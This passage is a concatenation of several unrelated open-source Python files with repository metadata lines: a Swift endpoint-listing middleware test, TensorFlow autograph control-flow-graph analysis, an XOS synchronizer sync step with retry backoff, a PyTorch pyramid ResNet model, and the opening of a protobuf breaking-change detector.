intended_replica2part2dev_id_a = [
array.array('H', [3, 1, 3, 1]),
array.array('H', [0, 3, 1, 4]),
array.array('H', [1, 4, 0, 3])]
intended_replica2part2dev_id_c = [
array.array('H', [4, 3, 0, 1]),
array.array('H', [0, 1, 3, 4]),
array.array('H', [3, 4, 0, 1])]
intended_replica2part2dev_id_o = [
array.array('H', [0, 1, 0, 1]),
array.array('H', [0, 1, 0, 1]),
array.array('H', [3, 4, 3, 4])]
intended_devs = [{'id': 0, 'zone': 0, 'weight': 1.0,
'ip': '10.1.1.1', 'port': 6000,
'device': 'sda1'},
{'id': 1, 'zone': 0, 'weight': 1.0,
'ip': '10.1.1.1', 'port': 6000,
'device': 'sdb1'},
None,
{'id': 3, 'zone': 2, 'weight': 1.0,
'ip': '10.1.2.1', 'port': 6000,
'device': 'sdc1'},
{'id': 4, 'zone': 2, 'weight': 1.0,
'ip': '10.1.2.2', 'port': 6000,
'device': 'sdd1'}]
intended_part_shift = 30
ring.RingData(intended_replica2part2dev_id_a,
intended_devs, intended_part_shift).save(accountgz)
ring.RingData(intended_replica2part2dev_id_c,
intended_devs, intended_part_shift).save(containergz)
ring.RingData(intended_replica2part2dev_id_o,
intended_devs, intended_part_shift).save(objectgz)
self.app = FakeApp()
self.list_endpoints = list_endpoints.filter_factory(
{'swift_dir': self.testdir})(self.app)
def tearDown(self):
rmtree(self.testdir, ignore_errors=1)
def test_get_endpoint(self):
# Expected results for objects taken from test_ring
# Expected results for others computed by manually invoking
# ring.get_nodes().
resp = Request.blank('/endpoints/a/c/o1').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/1/a/c/o1",
"http://10.1.2.2:6000/sdd1/1/a/c/o1"
])
# Here, 'o1/' is the object name.
resp = Request.blank('/endpoints/a/c/o1/').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/a/c/o1/",
"http://10.1.2.2:6000/sdd1/3/a/c/o1/"
])
resp = Request.blank('/endpoints/a/c2').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sda1/2/a/c2",
"http://10.1.2.1:6000/sdc1/2/a/c2"
])
resp = Request.blank('/endpoints/a1').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.2.1:6000/sdc1/0/a1",
"http://10.1.1.1:6000/sda1/0/a1",
"http://10.1.1.1:6000/sdb1/0/a1"
])
resp = Request.blank('/endpoints/').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 400)
resp = Request.blank('/endpoints/a/c 2').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/a/c%202",
"http://10.1.2.2:6000/sdd1/3/a/c%202"
])
resp = Request.blank('/endpoints/a/c%202').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/a/c%202",
"http://10.1.2.2:6000/sdd1/3/a/c%202"
])
resp = Request.blank('/endpoints/ac%20count/con%20tainer/ob%20ject') \
.get_response(self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/3/ac%20count/con%20tainer/ob%20ject",
"http://10.1.2.2:6000/sdd1/3/ac%20count/con%20tainer/ob%20ject"
])
resp = Request.blank('/endpoints/a/c/o1', {'REQUEST_METHOD': 'POST'}) \
.get_response(self.list_endpoints)
self.assertEquals(resp.status_int, 405)
self.assertEquals(resp.status, '405 Method Not Allowed')
self.assertEquals(resp.headers['allow'], 'GET')
resp = Request.blank('/not-endpoints').get_response(
self.list_endpoints)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.status, '200 OK')
self.assertEquals(resp.body, 'FakeApp')
# test custom path with trailing slash
custom_path_le = list_endpoints.filter_factory({
'swift_dir': self.testdir,
'list_endpoints_path': '/some/another/path/'
})(self.app)
resp = Request.blank('/some/another/path/a/c/o1') \
.get_response(custom_path_le)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/1/a/c/o1",
"http://10.1.2.2:6000/sdd1/1/a/c/o1"
])
        # test custom path without trailing slash
custom_path_le = list_endpoints.filter_factory({
'swift_dir': self.testdir,
'list_endpoints_path': '/some/another/path'
})(self.app)
resp = Request.blank('/some/another/path/a/c/o1') \
.get_response(custom_path_le)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(json.loads(resp.body), [
"http://10.1.1.1:6000/sdb1/1/a/c/o1",
"http://10.1.2.2:6000/sdd1/1/a/c/o1"
])
if __name__ == '__main__':
unittest.main()
| citrix-openstack-build/swift | test/unit/common/middleware/test_list_endpoints.py | Python | apache-2.0 | 8,008 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Control flow graph analysis.
Given a Python AST we construct a control flow graph, with edges both to the
next and previous statements (so it can easily walk the graph both ways). Its
nodes contain the AST of the statements. It can then perform forward or backward
analysis on this CFG.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import functools
import operator
import gast
from tensorflow.contrib.autograph.pyct import anno
from tensorflow.contrib.autograph.pyct.static_analysis import activity
class CfgNode(object):
"""A node in the CFG."""
__slots__ = ['next', 'value', 'prev']
def __init__(self, value):
self.next = set()
self.prev = set()
self.value = value
class Cfg(namedtuple('Cfg', ['entry', 'exit'])):
"""A Control Flow Graph.
Each statement is represented as a node. For control flow statements such
as conditionals and loops the conditional itself is a node which either
branches or cycles, respectively.
Attributes:
entry: The entry node, which contains the `gast.arguments` node of the
function definition.
exit: The exit node. This node is special because it has no value (i.e. no
corresponding AST node). This is because Python functions can have
multiple return statements.
"""
pass
class CfgBuilder(gast.NodeVisitor):
"""Construct a control flow graph.
Construct a CFG starting from a FunctionDef node.
Usage:
cfg_obj = CfgBuilder().build_cfg(fndef_node)
"""
def __init__(self):
# The current leaves of the CFG
self.current_leaves = []
# TODO(alexbw): generalize to break, return, continue, yield, etc.
# A stack of lists, tracking continue statements
self.continue_ = []
# A stack of lists tracking break nodes
self.break_ = []
def set_current_leaves(self, cfg_node):
"""Link this cfg_node to the current leaves.
This is the central function for building the CFG. It links the current
head cfg_nodes to the passed cfg_node. It then resets the head to the
passed cfg_node.
Args:
cfg_node: A CfgNode instance.
"""
for head in self.current_leaves:
head.next.add(cfg_node)
# While we're linking the CFG forward, add backlinks
cfg_node.prev.add(head)
self.current_leaves = [cfg_node]
def build_cfg(self, node):
"""Build a CFG for a function.
Implementation of building a CFG for dataflow analysis. See, e.g.:
https://www.seas.harvard.edu/courses/cs252/2011sp/slides/Lec02-Dataflow.pdf
Args:
node: A function definition the body of which to analyze.
Returns:
A CFG object.
Raises:
TypeError: If the input is not a function definition.
"""
if not isinstance(node, gast.FunctionDef):
raise TypeError('input must be a function definition')
entry_cfg_node = CfgNode(node.args)
self.current_leaves = [entry_cfg_node]
self.visit_statements(node.body)
exit_cfg_node = CfgNode(None)
self.set_current_leaves(exit_cfg_node)
return Cfg(entry_cfg_node, exit_cfg_node)
def visit_statements(self, nodes):
for node in nodes:
# Check for control flow
if isinstance(node, (gast.For, gast.While, gast.If, gast.Try, gast.Break,
gast.Continue, gast.With)):
self.visit(node)
else:
expr = CfgNode(node)
self.set_current_leaves(expr)
def generic_visit(self, node):
raise ValueError('unknown control flow')
def visit_If(self, node):
# TODO(alexbw): change this to use immutable tuples instead of lists
# The current head will hold the conditional
test = CfgNode(node.test)
self.set_current_leaves(test)
# Handle the body
self.visit_statements(node.body)
body_exit = self.current_leaves
self.current_leaves = [test]
# Handle the orelse
self.visit_statements(node.orelse)
self.current_leaves.extend(body_exit)
def visit_While(self, node):
test = CfgNode(node.test)
self.set_current_leaves(test)
# Start a new level of nesting
self.break_.append([])
self.continue_.append([])
# Handle the body
self.visit_statements(node.body)
body_exit = self.current_leaves
self.current_leaves.extend(self.continue_.pop())
self.set_current_leaves(test)
# Handle the orelse
self.visit_statements(node.orelse)
# The break statements and the test go to the next node
self.current_leaves.extend(self.break_.pop())
# Body and orelse statements can reach out of the loop
self.current_leaves.extend(body_exit)
def visit_For(self, node):
iter_ = CfgNode(node.iter)
self.set_current_leaves(iter_)
self.break_.append([])
self.continue_.append([])
self.visit_statements(node.body)
body_exit = self.current_leaves
self.current_leaves.extend(self.continue_.pop())
self.set_current_leaves(iter_)
# Handle the orelse
self.visit_statements(node.orelse)
# The break statements and the test go to the next node
self.current_leaves.extend(self.break_.pop())
# Body and orelse statements can reach out of the loop
self.current_leaves.extend(body_exit)
def visit_Break(self, node):
self.break_[-1].extend(self.current_leaves)
self.current_leaves[:] = []
def visit_Continue(self, node):
self.continue_[-1].extend(self.current_leaves)
self.current_leaves[:] = []
def visit_Try(self, node):
self.visit_statements(node.body)
body = self.current_leaves
handlers = []
for handler in node.handlers:
self.current_leaves = body[:]
self.visit_statements(handler.body)
handlers.extend(self.current_leaves)
self.current_leaves = body
self.visit_statements(node.orelse)
self.current_leaves = handlers + self.current_leaves
self.visit_statements(node.finalbody)
def visit_With(self, node):
for item in node.items:
self.set_current_leaves(CfgNode(item))
self.visit_statements(node.body)
# TODO(alexbw): once CFG analysis occurs at a block level,
# this extra class will not be necessary
class PropagateAnalysis(gast.NodeVisitor):
"""Port analysis annotations from statements to their enclosing blocks."""
def __init__(self, analysis):
self.transfer_fn = analysis.transfer_fn
self.in_label = analysis.in_label
self.out_label = analysis.out_label
super(PropagateAnalysis, self).__init__()
def visit_If(self, node):
# Depth-first.
self.generic_visit(node)
incoming = anno.getanno(node.body[0], self.in_label)
incoming |= anno.getanno(node.test, self.in_label)
outgoing = anno.getanno(node.body[-1], self.out_label)
outgoing |= anno.getanno(node.test, self.out_label)
if node.orelse:
orelse_outgoing = anno.getanno(node.orelse[-1], self.out_label)
outgoing = self.transfer_fn(outgoing, orelse_outgoing)
anno.setanno(node, self.in_label, incoming)
anno.setanno(node, self.out_label, outgoing)
def visit_For(self, node):
self.generic_visit(node)
incoming = set(anno.getanno(node.body[0], self.in_label))
incoming -= set((anno.getanno(node.target, anno.Basic.QN),))
outgoing = anno.getanno(node.body[-1], self.out_label)
if node.orelse:
orelse_outgoing = anno.getanno(node.orelse[-1], self.out_label)
outgoing = self.transfer_fn(outgoing, orelse_outgoing)
anno.setanno(node, self.in_label, frozenset(incoming))
anno.setanno(node, self.out_label, outgoing)
def visit_While(self, node):
self.generic_visit(node)
incoming = anno.getanno(node.body[0], self.in_label)
incoming |= anno.getanno(node.test, self.in_label)
outgoing = anno.getanno(node.body[-1], self.out_label)
if node.orelse:
orelse_outgoing = anno.getanno(node.orelse[-1], self.out_label)
outgoing = self.transfer_fn(outgoing, orelse_outgoing)
anno.setanno(node, self.in_label, incoming)
anno.setanno(node, self.out_label, outgoing)
def visit_With(self, node):
self.generic_visit(node)
incoming = anno.getanno(node.body[0], self.in_label)
for item in node.items:
incoming |= anno.getanno(item, self.in_label)
outgoing = anno.getanno(node.body[-1], self.out_label)
anno.setanno(node, self.in_label, incoming)
anno.setanno(node, self.out_label, outgoing)
# TODO(alexbw): Abstract the CFG walking machinery into a superclass
# which is parameterized on which fields it selects when walking.
# TODO(alexbw): Abstract the application of dataflow analysis
class Forward(object):
"""Forward analysis on CFG.
Args:
label: A name for this analysis e.g. 'active' for activity analysis. The AST
nodes in the CFG will be given annotations 'name_in', 'name_out',
'name_gen' and 'name_kill' which contain the incoming values, outgoing
values, values generated by the statement, and values deleted by the
statement respectively.
transfer_fn: Either the AND or OR operator. If the AND operator is used it
turns into forward must analysis (i.e. a value will only be carried
forward if it appears on all incoming paths). The OR operator means that
forward may analysis is done (i.e. the union of incoming values will be
taken).
"""
def __init__(self, label, source_info, transfer_fn=operator.or_):
self.transfer_fn = transfer_fn
self.source_info = source_info
self.out_label = label + '_out'
self.in_label = label + '_in'
self.gen_label = label + '_gen'
self.kill_label = label + '_kill'
# TODO(alexbw): see if we can simplify by visiting breadth-first
def visit(self, node):
"""Depth-first walking the CFG, applying dataflow info propagation."""
# node.value is None only for the exit CfgNode.
if not node.value:
return
if anno.hasanno(node.value, self.out_label):
before = hash(anno.getanno(node.value, self.out_label))
else:
before = None
preds = [
anno.getanno(pred.value, self.out_label)
for pred in node.prev
if anno.hasanno(pred.value, self.out_label)
]
if preds:
incoming = functools.reduce(self.transfer_fn, preds[1:], preds[0])
else:
incoming = frozenset()
anno.setanno(node.value, self.in_label, incoming)
gen, kill = self.get_gen_kill(node, incoming)
anno.setanno(node.value, self.gen_label, gen)
anno.setanno(node.value, self.kill_label, kill)
anno.setanno(node.value, self.out_label, (incoming - kill) | gen)
if hash(anno.getanno(node.value, self.out_label)) != before:
for succ in node.next:
self.visit(succ)
def get_gen_kill(self, cfg_node, incoming):
"""Calculate Gen and Kill properties of a CFG node in dataflow analysis.
A function which takes the CFG node as well as a set of incoming
values. It must return a set of newly generated values by the statement as
well as a set of deleted (killed) values.
Args:
cfg_node: A CfgNode instance.
incoming:
"""
raise NotImplementedError()
class Backward(Forward):
"""Backward analysis on CFG."""
def visit(self, cfg_node):
# cfg_node.value is None for the exit node, which will be visited only once
if not cfg_node.value:
for pred in cfg_node.prev:
self.visit(pred)
return
if anno.hasanno(cfg_node.value, self.in_label):
before = hash(anno.getanno(cfg_node.value, self.in_label))
else:
before = None
succs = [
anno.getanno(succ.value, self.in_label)
for succ in cfg_node.next
if anno.hasanno(succ.value, self.in_label)
]
if succs:
incoming = functools.reduce(self.transfer_fn, succs[1:], succs[0])
else:
incoming = frozenset()
anno.setanno(cfg_node.value, self.out_label, incoming)
gen, kill = self.get_gen_kill(cfg_node, incoming)
anno.setanno(cfg_node.value, self.gen_label, gen)
anno.setanno(cfg_node.value, self.kill_label, kill)
anno.setanno(cfg_node.value, self.in_label, (incoming - kill) | gen)
if hash(anno.getanno(cfg_node.value, self.in_label)) != before:
for pred in cfg_node.prev:
self.visit(pred)
def run_analyses(node, analyses):
"""Perform dataflow analysis on all functions within an AST.
Args:
node: An AST node on which to run dataflow analysis.
analyses: Either an instance of the Forward or Backward dataflow analysis
class, or a list or tuple of them.
Returns:
node: The node, but now with annotations on the AST nodes containing the
results of the dataflow analyses.
"""
if not isinstance(analyses, (tuple, list)):
analyses = (analyses,)
for analysis in analyses:
if not isinstance(analysis, (Forward, Backward)):
raise TypeError('not a valid forward analysis object')
for child_node in gast.walk(node):
if isinstance(child_node, gast.FunctionDef):
cfg_obj = CfgBuilder().build_cfg(child_node)
for analysis in analyses:
if isinstance(analysis, Backward):
analysis.visit(cfg_obj.exit)
elif isinstance(analysis, Forward):
analysis.visit(cfg_obj.entry)
for analysis in analyses:
PropagateAnalysis(analysis).visit(node)
return node
class Liveness(Backward):
"""Perform a liveness analysis.
Each statement is annotated with a set of variables that may be used
later in the program.
"""
def __init__(self, source_info):
super(Liveness, self).__init__('live', source_info)
def get_gen_kill(self, node, _):
# A variable's parents are live if it is live
# e.g. x is live if x.y is live. This means gen needs to return
# all parents of a variable (if it's an Attribute or Subscript).
# This doesn't apply to kill (e.g. del x.y doesn't affect liveness of x)
gen = activity.get_read(node.value, self.source_info)
gen = functools.reduce(lambda left, right: left | right.support_set, gen,
gen)
kill = activity.get_updated(node.value, self.source_info)
return gen, kill
class ReachingDefinitions(Forward):
"""Perform reaching definition analysis.
Each statement is annotated with a set of (variable, definition) pairs.
"""
def __init__(self, source_info):
super(ReachingDefinitions, self).__init__('definitions', source_info)
def get_gen_kill(self, node, incoming):
definitions = activity.get_updated(node.value, self.source_info)
gen = frozenset((id_, node.value) for id_ in definitions)
kill = frozenset(def_ for def_ in incoming if def_[0] in definitions)
return gen, kill
class Defined(Forward):
"""Perform defined variable analysis.
Each statement is annotated with a set of variables which are guaranteed to
be defined at that point.
"""
def __init__(self, source_info):
super(Defined, self).__init__(
'defined', source_info, transfer_fn=operator.and_)
def get_gen_kill(self, node, _):
gen = activity.get_updated(node.value, self.source_info)
return gen, frozenset()
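# Hedged usage sketch: run liveness analysis over a parsed function and read
# the results back off the AST annotations. `source_info` is assumed to be the
# transformer context object that `activity` expects; building a real one
# needs the surrounding autograph machinery, so this stays illustrative:
#
#   node = gast.parse(textwrap.dedent(source)).body[0]
#   node = run_analyses(node, Liveness(source_info))
#   live_out = anno.getanno(node.body[-1], 'live_out')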
| caisq/tensorflow | tensorflow/contrib/autograph/pyct/static_analysis/cfg.py | Python | apache-2.0 | 15,704 |
import os
import base64
from datetime import datetime
from xos.config import Config
from xos.logger import Logger, logging
from synchronizers.base.steps import *
from django.db.models import F, Q
from core.models import *
from django.db import reset_queries
from synchronizers.base.ansible import *
from generate.dependency_walker import *
import json
import time
import pdb
logger = Logger(level=logging.INFO)
def f7(seq):
seen = set()
seen_add = seen.add
return [ x for x in seq if not (x in seen or seen_add(x))]
def elim_dups(backend_str):
strs = backend_str.split(' // ')
strs2 = f7(strs)
return ' // '.join(strs2)
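# e.g. elim_dups('a // b // a') == 'a // b': f7 is an order-preserving dedup,
# so repeated backend-status fragments are collapsed, first occurrence kept.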
def deepgetattr(obj, attr):
return reduce(getattr, attr.split('.'), obj)
class InnocuousException(Exception):
pass
class DeferredException(Exception):
pass
class FailedDependency(Exception):
pass
class SyncStep(object):
""" An XOS Sync step.
Attributes:
psmodel Model name the step synchronizes
dependencies list of names of models that must be synchronized first if the current model depends on them
"""
# map_sync_outputs can return this value to cause a step to be marked
# successful without running ansible. Used for sync_network_controllers
# on nat networks.
SYNC_WITHOUT_RUNNING = "sync_without_running"
slow=False
def get_prop(self, prop):
try:
sync_config_dir = Config().sync_config_dir
except:
sync_config_dir = '/etc/xos/sync'
        prop_config_path = os.path.join(sync_config_dir, self.name, prop)
return open(prop_config_path).read().rstrip()
def __init__(self, **args):
"""Initialize a sync step
Keyword arguments:
name -- Name of the step
provides -- XOS models sync'd by this step
"""
dependencies = []
self.driver = args.get('driver')
self.error_map = args.get('error_map')
try:
self.soft_deadline = int(self.get_prop('soft_deadline_seconds'))
except:
self.soft_deadline = 5 # 5 seconds
return
def fetch_pending(self, deletion=False):
# This is the most common implementation of fetch_pending
# Steps should override it if they have their own logic
# for figuring out what objects are outstanding.
main_objs = self.observes
if (type(main_objs) is not list):
main_objs=[main_objs]
objs = []
for main_obj in main_objs:
if (not deletion):
lobjs = main_obj.objects.filter(Q(enacted__lt=F('updated')) | Q(enacted=None),Q(lazy_blocked=False),Q(no_sync=False))
else:
lobjs = main_obj.deleted_objects.all()
objs.extend(lobjs)
return objs
#return Instance.objects.filter(ip=None)
def check_dependencies(self, obj, failed):
for dep in self.dependencies:
peer_name = dep[0].lower() + dep[1:] # django names are camelCased with the first letter lower
peer_objects=[]
try:
peer_names = plural(peer_name)
peer_object_list=[]
try:
peer_object_list.append(deepgetattr(obj, peer_name))
except:
pass
try:
peer_object_list.append(deepgetattr(obj, peer_names))
except:
pass
for peer_object in peer_object_list:
try:
peer_objects.extend(peer_object.all())
except AttributeError:
peer_objects.append(peer_object)
except:
peer_objects = []
if (hasattr(obj,'controller')):
try:
peer_objects = filter(lambda o:o.controller==obj.controller, peer_objects)
except AttributeError:
pass
if (failed in peer_objects):
if (obj.backend_status!=failed.backend_status):
obj.backend_status = failed.backend_status
obj.save(update_fields=['backend_status'])
raise FailedDependency("Failed dependency for %s:%s peer %s:%s failed %s:%s" % (obj.__class__.__name__, str(getattr(obj,"pk","no_pk")), peer_object.__class__.__name__, str(getattr(peer_object,"pk","no_pk")), failed.__class__.__name__, str(getattr(failed,"pk","no_pk"))))
def sync_record(self, o):
try:
controller = o.get_controller()
controller_register = json.loads(controller.backend_register)
if (controller_register.get('disabled',False)):
raise InnocuousException('Controller %s is disabled'%controller.name)
except AttributeError:
pass
tenant_fields = self.map_sync_inputs(o)
if tenant_fields == SyncStep.SYNC_WITHOUT_RUNNING:
return
main_objs=self.observes
if (type(main_objs) is list):
main_objs=main_objs[0]
path = ''.join(main_objs.__name__).lower()
res = run_template(self.playbook,tenant_fields,path=path)
try:
self.map_sync_outputs(o,res)
except AttributeError:
pass
def delete_record(self, o):
try:
controller = o.get_controller()
controller_register = json.loads(o.node.site_deployment.controller.backend_register)
if (controller_register.get('disabled',False)):
                raise InnocuousException('Controller %s is disabled'%o.node.site_deployment.controller.name)
except AttributeError:
pass
tenant_fields = self.map_delete_inputs(o)
main_objs=self.observes
if (type(main_objs) is list):
main_objs=main_objs[0]
path = ''.join(main_objs.__name__).lower()
tenant_fields['delete']=True
res = run_template(self.playbook,tenant_fields,path=path)
try:
self.map_delete_outputs(o,res)
except AttributeError:
pass
def call(self, failed=[], deletion=False):
#if ('Instance' in self.__class__.__name__):
# pdb.set_trace()
pending = self.fetch_pending(deletion)
for o in pending:
# another spot to clean up debug state
try:
reset_queries()
except:
# this shouldn't happen, but in case it does, catch it...
logger.log_exc("exception in reset_queries",extra=o.tologdict())
sync_failed = False
try:
backoff_disabled = Config().observer_backoff_disabled
except:
backoff_disabled = 0
try:
scratchpad = json.loads(o.backend_register)
if (scratchpad):
next_run = scratchpad['next_run']
if (not backoff_disabled and next_run>time.time()):
sync_failed = True
except:
logger.log_exc("Exception while loading scratchpad",extra=o.tologdict())
pass
if (not sync_failed):
try:
for f in failed:
self.check_dependencies(o,f) # Raises exception if failed
if (deletion):
self.delete_record(o)
o.delete(purge=True)
else:
new_enacted = datetime.now() # Is this the same timezone? XXX
self.sync_record(o)
o.enacted = new_enacted
scratchpad = {'next_run':0, 'exponent':0, 'last_success':time.time()}
o.backend_register = json.dumps(scratchpad)
o.backend_status = "1 - OK"
o.save(update_fields=['enacted','backend_status','backend_register'])
except (InnocuousException,Exception,DeferredException) as e:
logger.log_exc("sync step failed!",extra=o.tologdict())
try:
if (o.backend_status.startswith('2 - ')):
str_e = '%s // %r'%(o.backend_status[4:],e)
str_e = elim_dups(str_e)
else:
str_e = '%r'%e
except:
str_e = '%r'%e
try:
error = self.error_map.map(str_e)
except:
error = '%s'%str_e
if isinstance(e, InnocuousException):
o.backend_status = '1 - %s'%error
else:
o.backend_status = '2 - %s'%error
try:
scratchpad = json.loads(o.backend_register)
                        scratchpad['exponent']  # a KeyError here falls through to the except below, which resets the scratchpad
except:
logger.log_exc("Exception while updating scratchpad",extra=o.tologdict())
scratchpad = {'next_run':0, 'exponent':0, 'last_success':time.time(),'failures':0}
# Second failure
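                    # Backoff sketch: with exponent n recorded, the next run
                    # is pushed out by n*10 minutes (n*1 minute for a
                    # DeferredException), capped at 8 hours; the exponent and
                    # failure count then grow by one.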
if (scratchpad['exponent']):
if isinstance(e,DeferredException):
delay = scratchpad['exponent'] * 60 # 1 minute
else:
delay = scratchpad['exponent'] * 600 # 10 minutes
# cap delays at 8 hours
if (delay>8*60*60):
delay=8*60*60
scratchpad['next_run'] = time.time() + delay
try:
scratchpad['exponent']+=1
except:
scratchpad['exponent']=1
try:
scratchpad['failures']+=1
except KeyError:
scratchpad['failures']=1
scratchpad['last_failure']=time.time()
o.backend_register = json.dumps(scratchpad)
# TOFIX:
# DatabaseError: value too long for type character varying(140)
if (o.pk):
try:
o.backend_status = o.backend_status[:1024]
o.save(update_fields=['backend_status','backend_register','updated'])
                        except:
                            print "Could not update backend status field!"
sync_failed = True
if (sync_failed):
failed.append(o)
return failed
def __call__(self, **args):
return self.call(**args)
| xmaruto/mcord | xos/synchronizers/base/syncstep.py | Python | apache-2.0 | 10,897 |
import os
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
def make_conv_bn_relu(in_channels, out_channels, kernel_size=3, stride=1, padding=1, groups=1):
return [
nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, padding=padding, groups=groups, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True),
]
def make_linear_bn_relu(in_channels, out_channels):
return [
nn.Linear(in_channels, out_channels, bias=False),
nn.BatchNorm1d(out_channels),
nn.ReLU(inplace=True),
]
def make_max_flat(out):
    flat = F.adaptive_max_pool2d(out, output_size=1)  # equivalent to nn.AdaptiveMaxPool2d(1)(out)
flat = flat.view(flat.size(0), -1)
return flat
def make_avg_flat(out):
flat = F.adaptive_avg_pool2d(out,output_size=1)
flat = flat.view(flat.size(0), -1)
return flat
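# Shape sketch for the helpers above (illustrative): an (N, C, H, W) feature
# map is adaptively pooled to (N, C, 1, 1) and then viewed as a flat (N, C)
# tensor, independent of the input spatial size.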
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class PyResNet(nn.Module):
def __init__(self, block, layers, in_shape=(3,256,256), num_classes=17):
self.inplanes = 64
super(PyResNet, self).__init__()
in_channels, height, width = in_shape
# self.conv0 = nn.Sequential(
# *make_conv_bn_relu(in_channels, 64, kernel_size=7, stride=2, padding=3, groups=1)
# )
self.conv1 = nn.Conv2d(in_channels, 64, kernel_size=7, stride=2, padding=3, bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self.make_layer(block, 64, layers[0])
self.layer2 = self.make_layer(block, 128, layers[1], stride=2)
self.layer3 = self.make_layer(block, 256, layers[2], stride=2)
self.layer4 = self.make_layer(block, 512, layers[3], stride=2)
self.fc2 = nn.Sequential(
*make_linear_bn_relu(128 * block.expansion, 512),
nn.Linear(512, num_classes),
)
self.fc3 = nn.Sequential(
*make_linear_bn_relu(256 * block.expansion, 512),
nn.Linear(512, num_classes),
)
self.fc4 = nn.Sequential(
*make_linear_bn_relu(512 * block.expansion, 512),
nn.Linear(512, num_classes),
)
# self.fc = nn.Sequential(
# *make_linear_bn_relu((128+256+512) * block.expansion, 1024),
# nn.Linear(1024, num_classes)
# )
#
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
#x = self.conv0(x)
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = F.max_pool2d(x, kernel_size=3, stride=2, padding=1)
x = self.layer1(x) # 64, 64x64
x = self.layer2(x) #128, 32x32
        flat2 = make_max_flat(x)  # make_avg_flat is the pooling alternative
x = self.layer3(x) #256, 16x16
flat3 = make_max_flat(x)
x = self.layer4(x) #512, 8x8
flat4 = make_max_flat(x)
# x = torch.cat([flat2,flat3,flat4,],1)
# x = self.fc(x)
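        # Design note: rather than concatenating the pooled features into one
        # classifier (the commented-out variant above), per-scale logits from
        # layers 2-4 are summed, giving each pyramid level its own head.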
x = self.fc2(flat2) + self.fc3(flat3) + self.fc4(flat4)
logit = x
prob = F.sigmoid(logit)
return logit, prob
def pyresnet18(**kwargs):
model = PyResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
return model
def pyresnet34(**kwargs):
model = PyResNet(BasicBlock, [3, 4, 6, 3], **kwargs)
return model
########################################################################################
if __name__ == '__main__':
print( '%s: calling main function ... ' % os.path.basename(__file__))
# https://discuss.pytorch.org/t/print-autograd-graph/692/8
batch_size = 1
num_classes = 17
C,H,W = 3,256,256
inputs = torch.randn(batch_size,C,H,W)
labels = torch.randn(batch_size,num_classes)
in_shape = inputs.size()[1:]
if 1:
net = pyresnet34(in_shape=in_shape, num_classes=num_classes).cuda().train()
x = Variable(inputs)
logits, probs = net.forward(x.cuda())
loss = nn.MultiLabelSoftMarginLoss()(logits, Variable(labels.cuda()))
loss.backward()
print(type(net))
print(net)
print('probs')
print(probs)
#input('Press ENTER to continue.')
| chicm/carvana | car-segment/net/imagenet/pyramidnet1.py | Python | apache-2.0 | 6,020 |
""" Protocol Buffer Breaking Change Detector
This tool is used to detect "breaking changes" in protobuf files, to
ensure proper backwards-compatibility in protobuf API updates. The tool
can check for breaking changes of a single API by taking 2 .proto file
paths as input (before and after) and outputting a bool `is_breaking`.
The breaking change detector creates a temporary directory, copies in
